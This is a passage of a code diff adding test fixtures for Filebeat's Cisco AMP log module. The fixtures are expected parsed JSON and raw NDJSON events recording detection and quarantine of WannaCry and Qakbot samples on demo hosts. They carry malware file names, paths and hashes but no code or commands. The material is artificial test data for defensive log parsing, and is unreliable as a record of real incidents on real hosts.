"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 121539, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 735000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 122910, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 124281, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log new file mode 100644 index 00000000000..dc134052124 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log @@ -0,0 +1,62 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 